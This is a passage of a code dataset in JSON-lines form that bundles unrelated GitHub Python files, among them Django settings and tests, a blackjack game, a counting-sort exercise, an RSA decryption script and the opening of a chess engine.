print(\"net_worth:\", episode, env.net_worth)\n break\n\n print(\"average {} episodes agent net_worth: {}\".format(test_episodes, average_net_worth/test_episodes))\n\ndf = pd.read_pickle('1 year data')\ndf = df.iloc[:, :6]\ndf.columns = ['Time', 'Open', 'High', 'Low', 'Close', 'Volume']\ndf = df.sort_values('Time')\ndf = df.set_index('Time')\ndf = df.astype(float)\n# df = addIndicators(df)\n\n\nlookback_window_size = 120\ntrain_df = df[:-14400]\ntest_df = df[-14400:] # 10 days\n\ntrading_cycle = 240\nrand = random.randint(0, 14400-trading_cycle*2)\ntest_df = df[rand:rand+2*trading_cycle]\n\n\ntrain_env = CustomEnv(train_df, lookback_window_size=lookback_window_size)\ntest_env = CustomEnv(test_df, lookback_window_size=lookback_window_size, trading_cycle=trading_cycle)\n\n# model = PPO(\"MlpPolicy\", train_env, verbose=1, tensorboard_log=log_path)\nmodel = PPO.load(save_path, env=train_env)\n\nmodel.learn(total_timesteps=1000000)\nmodel.save(save_path)\ntest_model(test_env, model)\n\n# Random_games(train_env, train_episodes=10, visualize=True)\n\n\n#510217\n#5,09,976","repo_name":"kush888/RL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18911282566","text":"import pytest\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\n\n@pytest.mark.django_db\n@pytest.mark.parametrize(\"url\", [reverse(\"subjects-list\")])\ndef test_subject_list_response(url, user_client):\n \"\"\"\n Ensure we can connect to subjects list url.\n \"\"\"\n assert user_client.get(url).status_code == status.HTTP_200_OK\n\n\n@pytest.mark.django_db\ndef test_post_subject_success(create_valid_user, user_client):\n \"\"\"\n Ensure we can add new subject.\n \"\"\"\n response = user_client.post(\n \"/api/v1/subjects/\",\n {\"title\": \"test\", \"description\": \"test test test\"},\n )\n assert response.status_code == status.HTTP_201_CREATED\n\n\n@pytest.mark.django_db\ndef test_subject_error_response(user_client):\n \"\"\"\n Ensure we get error 404 while trying to connect to non-exist subject url.\n \"\"\"\n response = user_client.get(\"/api/v1/subjects/1/get-404\")\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n\n@pytest.mark.django_db\ndef test_post_subject_failure(create_valid_user, user_client):\n \"\"\"\n Ensure we can add new subject.\n \"\"\"\n response = user_client.post(\n \"/api/v1/subjects/\",\n {\"title\": \"\", \"description\": \"test test test\"},\n )\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n\n\n@pytest.mark.django_db\ndef test_post_uniqueness(create_valid_user, user_client):\n \"\"\"\n Ensure we can't add equal subject.\n \"\"\"\n response = user_client.post(\n \"/api/v1/subjects/\",\n {\n \"title\": \"Python core\",\n \"description\": \"Introduction to python\",\n },\n )\n assert response.status_code == status.HTTP_201_CREATED\n\n response = user_client.post(\n \"/api/v1/subjects/\",\n {\n \"title\": \"Python core\",\n \"description\": \"Introduction to python\",\n },\n )\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n\n\n@pytest.mark.django_db\ndef test_subject_lectures_response(\n user_client, create_valid_lecture, create_second_valid_lecture\n):\n \"\"\"\n Ensure we get lectures list for one subject\n \"\"\"\n lecture = create_valid_lecture\n create_second_valid_lecture\n\n response = user_client.get(f\"/api/v1/subjects/{lecture.subject.id}/lectures/\")\n\n assert response.status_code == status.HTTP_200_OK\n","repo_name":"vladhoi/labs-management","sub_path":"app/tests/subjests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10822154109","text":"def proverka(m):\n n='бвгджзйклмнпрстфхцчшщБВГДЖЗЙКЛМНПРСТФХЦЧШЩ'\n c='ауоыиэяюёеАУОЫИЭЯЮЁЕ'\n a=0\n s=0\n for i in m:\n if i in n:\n a+=1\n for i in m:\n if i in c:\n s+=1\n return f'Количество гласных букв равно {s},Количество согласных букв равно {a}'\nprint(proverka(input()))","repo_name":"Yarik20o1/Domashka","sub_path":"Функции/Функция 5.py","file_name":"Функция 5.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40243412971","text":"# -*- coding: utf-8 -*\nimport rsa\ndef rsa_decrypt(message):\n\tmessage_str = rsa.decrypt(message,privkey).decode()\n\treturn message_str\n\nwith open('./rsa_private_key.pem' ,'r') as f:\n\tprivkey = rsa.PrivateKey.load_pkcs1(f.read().encode())\n\nf1=open('encrypt_message.txt','r')\ntext=f1.read()\ntext1 = rsa_decrypt(text)\n#print(text1)\nsep=text1.find('.txt')\t# 使用find方法找到标题与文本的分界位置\n\ntitle=text1[:sep+4]\t# 分离得到标题字符串\n#print(title)\ncontent=text1[sep+4:]\t# 分离得到文本字符串\n#print(content)\n\nwith open(title, \"w\") as f2:\n\tf2.write(str(content))\n\tf2.close()\n","repo_name":"xiaopeng-whu/socket-buffer_overflow","sub_path":"2017301510036-王泽鹏-2020网络安全考试/server/decrypt_file.py","file_name":"decrypt_file.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3826047839","text":"words = [\n\"cannon\",\n\"drawer\",\n\"current\",\n\"belief\",\n\"psychotic\",\n\"need\",\n\"unbiased\",\n\"tame\",\n\"breath\",\n\"brake\",\n\"stare\",\n\"screw\",\n\"doll\",\n\"hill\",\n\"soda\",\n\"elfin\",\n\"wicked\",\n\"vacation\",\n\"squeamish\",\n\"amuse\",\n\"crayon\",\n\"record\",\n\"check\",\n\"befitting\",\n\"lace\",\n\"connect\",\n\"halting\",\n\"quiet\",\n\"growth\",\n\"star\",\n\"alcoholic\",\n\"smoke\",\n\"numerous\",\n\"paper\",\n\"hard\",\n\"reach\",\n\"impefect\",\n\"sea\",\n\"glib\",\n\"match\",\n\"wasteful\",\n\"hellish\",\n\"grubby\",\n\"secretary\",\n\"coil\",\n\"aloof\",\n\"breath\",\n\"hanging\",\n\"search\",\n\"like\",\n\"coach\",\n\"pat\",\n\"impolite\",\n\"reject\",\n\"thick\"\n\"ink\",\n\"songs\",\n\"island\",\n\"raise\",\n\"first\",\n\"shaggy\",\n\"wacky\",\n\"blot\",\n\"lyrical\",\n\"plastic\",\n\"boast\",\n\"fresh\",\n\"unsuitable\",\n\"stretch\",\n\"ethereal\",\n\"pan\",\n\"street\",\n\"shaky\",\n\"fall\",\n\"male\",\n\"art\",\n\"glass\",\n\"scarf\",\n\"crib\",\n\"prevent\",\n\"inject\",\n\"verdant\",\n\"servant\",\n\"amount\",\n\"temper\",\n\"vagabond\",\n\"riddle\",\n\"compete\",\n\"confused\",\n\"easy\",\n\"shoe\",\n\"birth\",\n\"unwieldy\",\n\"detailed\",\n\"knowledge\",\n\"agreement\",\n\"limit\",\n\"examine\",\n\"cause\",\n\n]","repo_name":"SuzanDewitz/hangman-for-all","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22972206222","text":"import random\n\nclass Card:\n def __init__(self, value, type):\n self.value = value\n self.type = type\n \n def __str__(self):\n signs = '♠♥♣♦'\n card = str(self.value)\n if self.value == 1:\n card = 'A'\n if (self.value == 13):\n card = 'K'\n if (self.value == 12):\n card = 'Q'\n if (self.value == 11):\n card = 'J'\n\n return card+signs[self.type]\n def __repr__(self):\n signs = '♠♥♣♦'\n card = str(self.value)\n if self.value == 1:\n card = 'A'\n if (self.value == 13):\n card = 'K'\n if (self.value == 12):\n card = 'Q'\n if (self.value == 11):\n card = 'J'\n\n return card+signs[self.type]\n\nclass Deck:\n def __init__(self):\n self.cards = [Card(i,j) for i in range(1,14) for j in range(0,4)]\n \n def __str__(self):\n return str(self.cards)\n\n def shuffle(self):\n random.shuffle(self.cards)\n\n def deal(self):\n top = self.cards[0]\n self.cards.pop(0)\n return top\n\ndef is_win(hand, dhand):\n return (sum([x.value for x in hand]) <= 21 and sum([x.value for x in hand]) > sum([x.value for x in dhand]))\ndef main():\n pile = Deck()\n pile.shuffle()\n hand = []\n hand += [pile.deal(), pile.deal()]\n dhand = []\n dhand += [pile.deal(), pile.deal()]\n if (sum([x.value for x in hand]) == 21):\n print(\"You win!\")\n print(\"Hand: \" + str(hand))\n ans = input(\"Would you like a card? (y/n): \")\n while (ans != 'y' and ans != 'n'):\n ans = input(\"Enter y for yes and n for no: \")\n if ans == 'y':\n hand += [pile.deal()]\n if (sum([x.value for x in dhand]) < 18):\n dhand += [pile.deal()]\n print(\"Hand: \" + str(hand))\n while (sum([x.value for x in hand]) < 21 and ans != 'n'):\n ans = input(\"Would you like a card? (y/n): \")\n while (ans != 'y' and ans != 'n'):\n ans = input(\"Enter y for yes and n for no: \")\n if ans == 'y':\n hand += [pile.deal()]\n print(\"Hand: \" + str(hand))\n if (sum([x.value for x in dhand]) < 18):\n dhand += [pile.deal()]\n if (is_win(hand,dhand)):\n print(\"You win!\")\n print(\"Your hand:\", hand)\n print(\"Dealer's hand:\", dhand)\n else:\n print(\"You lose!\")\n print(\"Your hand:\", hand)\n print(\"Dealer's hand:\", dhand)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ab235/4schoolers1","sub_path":"hw/blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35580131315","text":"from armarx_control.utils.pkg import get_armarx_package_data_dir\nfrom armarx_control.config.njoint_controllers.taskspace_impedance import TaskspaceImpedanceControllerConfig\n\n\njson_file = get_armarx_package_data_dir(\"armarx_control\") / \"controller_config/NJointTaskspaceImpedanceController/default.json\"\nconfig = TaskspaceImpedanceControllerConfig().from_json(str(json_file))\nic(config)\nconfig_aron_ice = config.to_aron_ice()\nic(config_aron_ice)\nconfig_py = TaskspaceImpedanceControllerConfig().from_aron_ice(config_aron_ice)\nic(config_py)\n\n","repo_name":"markusgrotz/python3-armarx","sub_path":"armarx_control/test/test_aron.py","file_name":"test_aron.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40925656214","text":"import os\nimport sentry_sdk\nimport sys\nimport dotenv\n\nfrom datetime import timedelta\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom os.path import join\n\nTESTING = sys.argv[1:2] == ['test']\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nif not TESTING:\n dotenv.read_dotenv(ROOT_DIR)\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSITE_URL = os.getenv('SITE_URL', 'http://localhost:8000')\n\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'jet',\n 'django.contrib.admin',\n # Third party apps\n 'rest_framework', # utilities for rest apis\n 'rest_framework.authtoken', # token authentication\n 'django_filters', # for filtering rest endpoints\n 'django_rest_passwordreset', # for reset password endpoints\n 'drf_yasg', # swagger api\n 'easy_thumbnails', # image lib\n 'social_django', # social login\n 'corsheaders', # cors handling\n 'django_inlinecss', # inline css in templates\n 'django_summernote', # text editor\n 'django_celery_beat', # task scheduler\n 'djmoney', # money object\n 'health_check',\n 'health_check.db', # stock Django health checkers\n 'health_check.cache',\n 'health_check.storage',\n 'health_check.contrib.migrations',\n 'health_check.contrib.celery_ping', # requires celery\n # Your apps\n 'src.notifications',\n 'src.users',\n 'src.social',\n 'src.files',\n 'src.common',\n # Third party optional apps\n # app must be placed somewhere after all the apps that are going to be generating activities\n # 'actstream', # activity stream\n)\n\n# https://docs.djangoproject.com/en/2.0/topics/http/middleware/\nMIDDLEWARE = (\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'social_django.middleware.SocialAuthExceptionMiddleware',\n)\n\nSECRET_KEY = os.getenv('DJANGO_SECRET_KEY', '#p7&kxb7y^yq8ahfw5%$xh=f8=&1y*5+a5($8w_f7kw!-qig(j')\nALLOWED_HOSTS = [\"*\"]\nROOT_URLCONF = 'src.urls'\nWSGI_APPLICATION = 'src.wsgi.application'\n\n# Email\nEMAIL_BACKEND = os.getenv('EMAIL_BACKEND', 'django.core.mail.backends.smtp.EmailBackend')\nEMAIL_HOST = os.getenv('EMAIL_HOST', 'localhost')\nEMAIL_PORT = os.getenv('EMAIL_PORT', 1025)\nEMAIL_FROM = os.getenv('EMAIL_FROM', 'noreply@somehost.local')\n\n# Celery\nBROKER_URL = os.getenv('BROKER_URL', 'redis://redis:6379')\nCELERY_RESULT_BACKEND = os.getenv('CELERY_RESULT_BACKEND', 'redis://redis:6379')\n\nADMINS = ()\n\n# Sentry\nsentry_sdk.init(dsn=os.getenv('SENTRY_DSN', ''), integrations=[DjangoIntegration()])\n\n# CORS\nCORS_ORIGIN_ALLOW_ALL = True\n\n# CELERY\nCELERY_ACCEPT_CONTENT = ['application/json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TIMEZONE = 'UTC'\n\n# Postgres\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': os.getenv('DB_NAME'),\n 'USER': os.getenv('DB_USER'),\n 'PASSWORD': os.getenv('DB_PASSWORD'),\n 'HOST': os.getenv('DB_HOST', 'db'),\n 'PORT': os.getenv('DB_PORT'),\n }\n}\n\n# General\nAPPEND_SLASH = True\nTIME_ZONE = 'UTC'\nLANGUAGE_CODE = 'en-us'\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = False\nUSE_L10N = True\nUSE_TZ = True\nLOGIN_REDIRECT_URL = '/'\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\nSTATIC_ROOT = os.path.normpath(join(os.path.dirname(BASE_DIR), 'static'))\nSTATICFILES_DIRS = []\nSTATIC_URL = '/static/'\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# Media files\nMEDIA_ROOT = join(os.path.dirname(BASE_DIR), 'media')\nMEDIA_URL = '/media/'\n\n# Headers\nUSE_X_FORWARDED_HOST = True\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': STATICFILES_DIRS,\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'social_django.context_processors.backends',\n 'social_django.context_processors.login_redirect',\n ],\n },\n },\n]\n\n# Set DEBUG to False as a default for safety\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = os.getenv('DJANGO_DEBUG', False) == 'True'\n\n# Password Validation\n# https://docs.djangoproject.com/en/2.0/topics/auth/passwords/#module-django.contrib.auth.password_validation\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Logging\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'django.server': {\n '()': 'django.utils.log.ServerFormatter',\n 'format': '[%(server_time)s] %(message)s',\n },\n 'verbose': {'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'},\n 'simple': {'format': '%(levelname)s %(message)s'},\n },\n 'filters': {\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'django.server': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'django.server',\n },\n 'console': {'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'simple'},\n 'mail_admins': {'level': 'ERROR', 'class': 'django.utils.log.AdminEmailHandler'},\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n },\n 'django.server': {\n 'handlers': ['django.server'],\n 'level': 'INFO',\n 'propagate': False,\n },\n 'django.request': {\n 'handlers': ['mail_admins', 'console'],\n 'level': 'ERROR',\n 'propagate': False,\n },\n 'django.db.backends': {'handlers': ['console'], 'level': 'INFO'},\n },\n}\n\n# Custom user app\nAUTH_USER_MODEL = 'users.User'\n\n# Social login\nAUTHENTICATION_BACKENDS = (\n 'social_core.backends.facebook.FacebookOAuth2',\n 'social_core.backends.twitter.TwitterOAuth',\n 'src.users.backends.EmailOrUsernameModelBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\nfor key in ['GOOGLE_OAUTH2_KEY', 'GOOGLE_OAUTH2_SECRET', 'FACEBOOK_KEY', 'FACEBOOK_SECRET', 'TWITTER_KEY', 'TWITTER_SECRET']:\n exec(\"SOCIAL_AUTH_{key} = os.environ.get('{key}', '')\".format(key=key))\n\n# FB\nSOCIAL_AUTH_FACEBOOK_SCOPE = ['email']\nSOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {'fields': 'id, name, email'}\nSOCIAL_AUTH_FACEBOOK_API_VERSION = '5.0'\n\n# Twitter\nSOCIAL_AUTH_TWITTER_SCOPE = ['email']\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['email', 'profile']\nSOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = ['username', 'first_name', 'email']\n# If this is not set, PSA constructs a plausible username from the first portion of the\n# user email, plus some random disambiguation characters if necessary.\nSOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True\nSOCIAL_AUTH_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.auth_allowed',\n 'social_core.pipeline.social_auth.social_user',\n 'social_core.pipeline.user.get_username',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.social_auth.load_extra_data',\n 'social_core.pipeline.user.user_details',\n)\n\nSOCIAL_AUTH_TWITTER_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.auth_allowed',\n # 'social_core.pipeline.social_auth.social_user',\n 'src.common.social_pipeline.user.social_user',\n 'social_core.pipeline.user.get_username',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.social_auth.load_extra_data',\n 'social_core.pipeline.user.user_details',\n 'src.common.social_pipeline.user.login_user', # login correct user at the end\n)\n\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = '/complete/twitter/'\n\nTHUMBNAIL_ALIASES = {\n 'src.users': {\n 'thumbnail': {'size': (100, 100), 'crop': True},\n 'medium_square_crop': {'size': (400, 400), 'crop': True},\n 'small_square_crop': {'size': (50, 50), 'crop': True},\n },\n}\n\n# Django Rest Framework\n\n# Django Rest Framework\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'DEFAULT_FILTER_BACKENDS': ['django_filters.rest_framework.DjangoFilterBackend', 'rest_framework.filters.OrderingFilter'],\n 'PAGE_SIZE': int(os.getenv('DJANGO_PAGINATION_LIMIT', 18)),\n 'DATETIME_FORMAT': '%Y-%m-%dT%H:%M:%S.%fZ',\n 'DEFAULT_RENDERER_CLASSES': (\n 'rest_framework.renderers.JSONRenderer',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n ),\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.IsAuthenticated',\n ],\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n 'DEFAULT_THROTTLE_CLASSES': [\n 'rest_framework.throttling.AnonRateThrottle',\n 'rest_framework.throttling.UserRateThrottle',\n 'rest_framework.throttling.ScopedRateThrottle',\n ],\n 'DEFAULT_THROTTLE_RATES': {'anon': '100/second', 'user': '1000/second', 'subscribe': '60/minute'},\n 'TEST_REQUEST_DEFAULT_FORMAT': 'json',\n}\n\n# JWT configuration\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=60),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n 'ROTATE_REFRESH_TOKENS': False,\n 'BLACKLIST_AFTER_ROTATION': True,\n 'UPDATE_LAST_LOGIN': False,\n 'ALGORITHM': 'HS256',\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n 'AUTH_HEADER_TYPES': ('Bearer',),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n 'JTI_CLAIM': 'jti',\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n# summernote configuration\nSUMMERNOTE_CONFIG = {\n 'summernote': {\n 'toolbar': [\n ['style', ['style']],\n ['font', ['bold', 'underline', 'clear']],\n ['fontname', ['fontname']],\n ['color', ['color']],\n ['para', ['ul', 'ol', 'paragraph', 'smallTagButton']],\n ['table', ['table']],\n ['insert', ['link', 'video']],\n ['view', ['fullscreen', 'codeview', 'help']],\n ]\n }\n}\n\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n","repo_name":"Vivify-Ideas/python-django-drf-boilerplate","sub_path":"src/config/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":12192,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"61"} +{"seq_id":"13509585023","text":"\nlista = [2,3,5,2,2,1,2,3,12]\nprint(lista)\ndef counting_sort(lista):\n N = len(lista)\n M = max(lista) + 1\n out = [0] * N \n count = [0] * (M)\n \n for i in range(1, N):\n count[lista[i]] += 1\n print(count)\n\n for i in range (1, M):\n count[i] += count[i-1]\n\n t = N - 1\n while t >= 0: \n out[count[lista[t]]-1] = lista[t]\n count[lista[t]] -= 1\n t-=1\n \n for i in range(0,N):\n lista[i] = out[i]\n\ncounting_sort(lista)\nprint(lista) \n'''\n print(out)\nx = counting_sort(lista)\nprint(x)\n \nlista input\nlista de indices do tamanho do valor max da lista input\narr de contagem zerado do mesmo tamanho para contarmos as repetições da entrada\ncontadas as repetições da lista input no arr de contagem somamos o valor da posição atual com a anterior(i= i + (i-1))\n \"\"\"\nfor j in range (0, M+1):\n k = count[j]\n i = 0\n while(k > 0):\n if k == 0:\n break\n out[i] = j\n print(out)\n \n k -= 1\n\"\"\"\n\n '''\n\"\"\"\nrodou:\ndef countingSort(arr):\n size = len(arr)\n output = [0] * size\n N = max(arr) + 1\n\n # count array initialization\n count = [0] * N\n\n # storing the count of each element \n for m in range(0, size):\n count[arr[m]] += 1\n\n # storing the cumulative count\n for m in range(1, N):\n count[m] += count[m - 1]\n\n # place the elements in output array after finding the index of each element of original array in count array\n m = size - 1\n while m >= 0:\n output[count[arr[m]] - 1] = arr[m]\n count[arr[m]] -= 1\n m -= 1\n\n for m in range(0, size):\n arr[m] = output[m]\n\ndata = [2,3,5,2,2,1,2,3,12]\ncountingSort(data)\nprint(\"Sorted Array: \")\nprint(data)\n\"\"\"","repo_name":"thiagoclrss/sort-algorithms","sub_path":"countingSort.py","file_name":"countingSort.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22358044258","text":"#!/usr/bin/python3\n\"\"\"testing the base\"\"\"\nimport unittest\nfrom models.base_model import BaseModel\nimport re\nimport datetime\n\n\nclass test_BaseModel(unittest.TestCase):\n \"\"\"tests for BaseModel class #3\"\"\"\n\n def setUp(self):\n self.a = BaseModel()\n self.b = BaseModel()\n\n def tearDown(self):\n del self.a\n del self.b\n\n def test_existance(self):\n \"\"\"test for existance of variables\"\"\"\n # print(\"\\nIn existance\")\n m = \"\"\n for k in self.a.__dict__:\n m = m + \" \" + k\n i = re.search('id', m)\n k = re.search('created_at', m)\n j = re.search('updated_at', m)\n self.assertIsNotNone(i)\n self.assertIsNotNone(k)\n self.assertIsNotNone(j)\n\n def test_format(self):\n \"\"\"test str format\"\"\"\n # print(\"\\nIn format\")\n \"\"\"check format of str output\"\"\"\n self.assertRegex(self.a.__str__(), '\\[.*\\]\\s+\\(.*\\)\\s+\\{.*\\}')\n\n def test_id(self):\n \"\"\"test id format\"\"\"\n # print(\"\\nIn id\")\n \"\"\"check uuid format\"\"\"\n self.assertRegex(self.a.id, '\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12}')\n \"\"\"check id randomness, compare ids\"\"\"\n self.assertFalse(self.a.id == self.b.id)\n\n def test_instance(self):\n \"\"\"test instance variables\"\"\"\n # print(\"\\nIn instance\")\n \"\"\"check each if each variable isinstance str\"\"\"\n self.assertIsInstance(self.a.id, str)\n self.assertIsInstance(self.a.created_at, datetime.datetime)\n self.assertIsInstance(self.a.updated_at, datetime.datetime)\n\n def test_time(self):\n \"\"\"test time\"\"\"\n # print(\"\\nIn time\")\n \"\"\"check ISO8601 format\"\"\"\n pattern = r'\\d{4}-\\d{2}-\\d{2}[T]\\d{2}:\\d{2}.\\d{2}.\\d{6}'\n self.assertRegex(self.a.created_at.isoformat(), pattern)\n self.assertRegex(self.a.updated_at.isoformat(), pattern)\n \"\"\"False: created >= update\"\"\"\n self.assertTrue(self.a.created_at <= self.a.updated_at)\n temp = self.a.updated_at\n self.a.save()\n self.assertNotEqual(self.a.updated_at, temp)\n\n def test_dict(self):\n \"\"\"test to_dict\"\"\"\n # print('\\nin dict')\n self.assertIsInstance(self.a, BaseModel)\n self.assertIsInstance(self.a.to_dict(), dict)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Raid55/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11789596336","text":"import numpy as np\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.board = np.array([\r\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\r\n [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\r\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]])\r\n self.getPieceMoves = {\"p\": self.getPawnMoves, \"R\": self.getRookMoves, \"N\": self.getKnightMoves,\r\n \"B\": self.getBishopMoves, \"Q\": self.getQueenMoves, \"K\": self.getKingMoves}\r\n self.whiteToMove = True\r\n self.wKLocation = (7, 4)\r\n self.bKLocation = (0, 4)\r\n self.whiteKingsideCastle = True\r\n self.whiteQueensideCastle = True\r\n self.blackKingsideCastle = True\r\n self.blackQueensideCastle = True\r\n self.enPassantPossible = False\r\n self.doubleEnPassant = False\r\n self.pawnMoved = ()\r\n self.enPassantPawns = ()\r\n self.inCheck = False\r\n self.checkmate = False\r\n self.stalemate = False\r\n self.draw = False\r\n self.pins = []\r\n self.checks = []\r\n self.sincePawnMoved = 0\r\n self.sinceCapture = 0\r\n self.moveLog = []\r\n\r\n def getPawnMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n self.pins.remove(self.pins[i])\r\n break\r\n if self.whiteToMove:\r\n moveDirection = -1\r\n startRow = 6\r\n backRow = 0\r\n enemy = \"b\"\r\n else:\r\n moveDirection = 1\r\n startRow = 1\r\n backRow = 